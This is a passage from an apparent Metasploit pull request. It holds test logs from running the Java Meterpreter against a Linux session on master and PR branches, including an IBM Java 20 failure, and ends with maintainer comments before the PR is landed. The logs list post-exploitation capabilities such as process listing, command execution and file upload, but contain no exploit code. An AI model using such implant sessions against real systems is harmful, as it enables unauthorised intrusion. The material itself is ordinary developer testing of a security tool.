[+] should search with date inclusive of exact date
[*] Passed: 8; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/unix against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should list users
[*] Passed: 1; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Modules results:
Results for java/linux session 1
================================

 #  Name                          is_session_platform  is_session_type  total  passed  failures  skipped
 -  ----                          -------------------  ---------------  -----  ------  --------  -------
 0  test/unix                     Yes                  Yes              1      1       0         0
 1  test/file                     Yes                  Yes              21     21      0         0
 2  test/get_env                  Yes                  Yes              3      3       0         0
 3  test/meterpreter              Yes                  Yes              20     20      0         0
 4  test/railgun                  Yes                  Yes              3      3       0         3
 5  test/railgun_reverse_lookups  Yes                  Yes              4      4       0         4
 6  test/search                   Yes                  Yes              8      8       0         0
 7  test/cmd_exec                 Yes                  Yes              7      7       0         0

[*] Post module execution completed
```

</details>

### PR Branch
<details>

```ruby
[*] Applicable modules:
Valid modules for java/linux session 1
======================================

 #   Name                          is_session_platform  is_session_type
 -   ----                          -------------------  ---------------
 0   test/unix                     Yes                  Yes
 1   test/railgun_reverse_lookups  Yes                  Yes
 2   test/search                   Yes                  Yes
 3   test/cmd_exec                 Yes                  Yes
 4   test/file                     Yes                  Yes
 5   test/get_env                  Yes                  Yes
 6   test/meterpreter              Yes                  Yes
 7   test/railgun                  Yes                  Yes
 8   test/extapi                   No                   Yes
 9   test/services                 No                   Yes
 10  test/registry                 No                   Yes

[*] Running test/cmd_exec against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/file against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should expand home
[+] should not expand non-isolated tilde
[+] should not expand mid-string tilde
[+] should not expand env vars with invalid naming
[+] should expand multiple variables
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 21; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/get_env against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return user
[+] should handle $ sign
[+] should return multiple envs
[*] Passed: 3; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/meterpreter against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/railgun against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod, stdapi_railgun_api, stdapi_railgun_memread
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_api_function_calls_libc (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_api_function_calls_windows (session platform is not windows)
[*] SKIPPED: def test_api_function_file_info_windows (session platform is not windows)
[*] Passed: 3; Failed: 0; Skipped: 3
[*] --------------------------------------------------------------------------------
[*] Running test/railgun_reverse_lookups against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_osx_static (session platform is not osx)
[*] SKIPPED: def test_linux_static (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_windows_static (session platform is not windows)
[*] SKIPPED: def test_windows_datastore (session platform is not windows)
[*] Passed: 4; Failed: 0; Skipped: 4
[*] --------------------------------------------------------------------------------
[*] Running test/search against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should search for new files
[+] should search recursively for files
[+] should search with globs for files
[+] should search with globs ignoring files
[+] should search with dates for files
[+] should search with dates ignores new files
[+] should search with dates ignores old files
[+] should search with date inclusive of exact date
[*] Passed: 8; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/unix against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should list users
[*] Passed: 1; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Modules results:
Results for java/linux session 1
================================

 #  Name                          is_session_platform  is_session_type  total  passed  failures  skipped
 -  ----                          -------------------  ---------------  -----  ------  --------  -------
 0  test/unix                     Yes                  Yes              1      1       0         0
 1  test/file                     Yes                  Yes              21     21      0         0
 2  test/get_env                  Yes                  Yes              3      3       0         0
 3  test/meterpreter              Yes                  Yes              20     20      0         0
 4  test/railgun                  Yes                  Yes              3      3       0         3
 5  test/railgun_reverse_lookups  Yes                  Yes              4      4       0         4
 6  test/search                   Yes                  Yes              8      8       0         0
 7  test/cmd_exec                 Yes                  Yes              7      7       0         0

[*] Post module execution completed
```

</details>

## IBM Java 20
### Master Branch
<details>

msfconsole logs the following:
```ruby
[10/05/2023 13:45:57] [d(0)] core: Session 1 failed to negotiate TLV encryption
[10/05/2023 13:45:57] [w(0)] core: Session 1 has died
```

</details>

### PR Branch
<details>

```ruby
msf6 post(test/all) > run session=-1

[*] Applicable modules:
Valid modules for java/linux session 2
======================================

 #   Name                          is_session_platform  is_session_type
 -   ----                          -------------------  ---------------
 0   test/unix                     Yes                  Yes
 1   test/railgun_reverse_lookups  Yes                  Yes
 2   test/search                   Yes                  Yes
 3   test/cmd_exec                 Yes                  Yes
 4   test/file                     Yes                  Yes
 5   test/get_env                  Yes                  Yes
 6   test/meterpreter              Yes                  Yes
 7   test/railgun                  Yes                  Yes
 8   test/extapi                   No                   Yes
 9   test/services                 No                   Yes
 10  test/registry                 No                   Yes

[*] Running test/cmd_exec against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/file against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[+] should expand home
[+] should not expand non-isolated tilde
[+] should not expand mid-string tilde
[+] should not expand env vars with invalid naming
[+] should expand multiple variables
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[*] Passed: 21; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/get_env against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return multiple envs
[+] should return user
[+] should handle $ sign
[*] Passed: 3; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/meterpreter against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/railgun against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod, stdapi_railgun_api, stdapi_railgun_memread
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_api_function_file_info_windows (session platform is not windows)
[*] SKIPPED: def test_api_function_calls_libc (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_api_function_calls_windows (session platform is not windows)
[*] Passed: 3; Failed: 0; Skipped: 3
[*] --------------------------------------------------------------------------------
[*] Running test/railgun_reverse_lookups against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_osx_static (session platform is not osx)
[*] SKIPPED: def test_linux_static (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_windows_static (session platform is not windows)
[*] SKIPPED: def test_windows_datastore (session platform is not windows)
[*] Passed: 4; Failed: 0; Skipped: 4
[*] --------------------------------------------------------------------------------
[*] Running test/search against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should search for new files
[+] should search recursively for files
[+] should search with globs for files
[+] should search with globs ignoring files
[+] should search with dates for files
[+] should search with dates ignores new files
[+] should search with dates ignores old files
[+] should search with date inclusive of exact date
[*] Passed: 8; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/unix against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should list users
[*] Passed: 1; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Modules results:
Results for java/linux session 2
================================

 #  Name                          is_session_platform  is_session_type  total  passed  failures  skipped
 -  ----                          -------------------  ---------------  -----  ------  --------  -------
 0  test/unix                     Yes                  Yes              1      1       0         0
 1  test/file                     Yes                  Yes              21     21      0         0
 2  test/get_env                  Yes                  Yes              3      3       0         0
 3  test/meterpreter              Yes                  Yes              20     20      0         0
 4  test/railgun                  Yes                  Yes              3      3       0         3
 5  test/railgun_reverse_lookups  Yes                  Yes              4      4       0         4
 6  test/search                   Yes                  Yes              8      8       0         0
 7  test/cmd_exec                 Yes                  Yes              7      7       0         0

[*] Post module execution completed
```

</details>

**Comment by adfoster-r7** [comment]
> Foreign Function and Memory API did not make it into Java 21 proper, only as "Preview", and I cannot think of any other new Java features that would create benefit for Meterpreter

100% - @sjanusz-r7 looked at [adding JNA/JNI support to the Java Meterpreter](https://github.com/rapid7/metasploit-framework/pull/162) but it didn't seem beneficial as you still needed to end up writing to disk, but the new [foreign function/memory API](https://docs.oracle.com/en/java/javase/21/core/foreign-function-and-memory-api.html#GUID-FBE990DA-C356-46E8-9109-C75567849BA8) looks really nice. I imagine it will be a while before commonplace on machines though 😄 

That aside, thanks for casting your eyes over the PR and original issue @schierlm! :+1:

**Comment by jheysel-r7** [comment]
Thanks to everyone for all your hard work and input on this PR! 🙇  All tests are passing, going to go ahead and get this landed.
